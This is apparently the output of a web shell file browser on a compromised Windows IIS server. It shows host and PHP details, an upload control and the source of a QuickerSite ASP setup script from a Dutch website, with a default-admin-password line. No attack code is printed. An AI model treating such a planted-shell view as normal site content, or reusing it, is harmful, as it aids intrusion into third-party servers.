HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/EBos/ellen-paragnost.nl/wwwroot/asp/ad_cs.asp
<!-- #include file="begin.asp"-->


<%'QuickerSite - (C) 2006-09 by P. Cooreman%><%dim customerObj
set customerObj=new cls_customer
customerObj.sName	= "New site"
customerObj.sURL	= "http://localhost"
customerObj.dOnlineFrom	= date()
customerObj.bApplication	= false
customerObj.bScanReferer	= false
customerObj.sAlternateDomains	= ""
customerObj.bUserFriendlyURL	= false
customerObj.bAllowStorageOutsideWWW = false
customerObj.bEnableMainRSS	= false
customerObj.adminPassword	= sha256(QS_defaultPW)
customerObj.webmasterEmail	= "your@email.com"
if customerObj.save() then
end if
set customerObj=nothing%>